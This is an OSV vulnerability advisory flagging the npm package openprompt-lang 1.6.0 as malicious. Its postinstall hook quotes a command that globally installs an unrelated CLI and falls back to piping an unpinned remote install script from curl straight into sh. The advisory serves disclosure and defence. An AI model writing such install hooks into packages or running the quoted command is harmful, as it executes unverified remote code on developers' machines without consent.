openprompt-lang @1.6.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-4630
Ecosystem
npm
Summary
On every npm install, openprompt-lang's postinstall hook (scripts/postinstall.js:83) executes "npm install -g @opencode/cli 2>/dev/null || curl -fsSL https://opencode.ai/install.sh 2>/dev/null | sh". The fallback fetches an unpinned shell script from opencode.ai and pipes it directly to sh with no version, no hash, and no integrity check. The destination domain is not the package's publisher (the package is published under a different GitHub identity) and the auto-installed tool is unrelated to the package's stated purpose (a prompt-engineering CLI). Whatever bytes opencode.ai serves at install time run on every consumer's machine, with no user prompt or opt-out. If opencode.ai is ever compromised, redirected, or the served script is modified, every installer of openprompt-lang executes the new payload. The same line additionally performs an unsolicited global install of an unrelated third-party CLI (@opencode/cli), mutating the developer's global npm environment as a side effect of installing this library.
Source: amazon-inspector (24ccd29557423c05fb49b14b0a9a2e1cfbe5a2b69a1276bc76d287edc46f4ec2)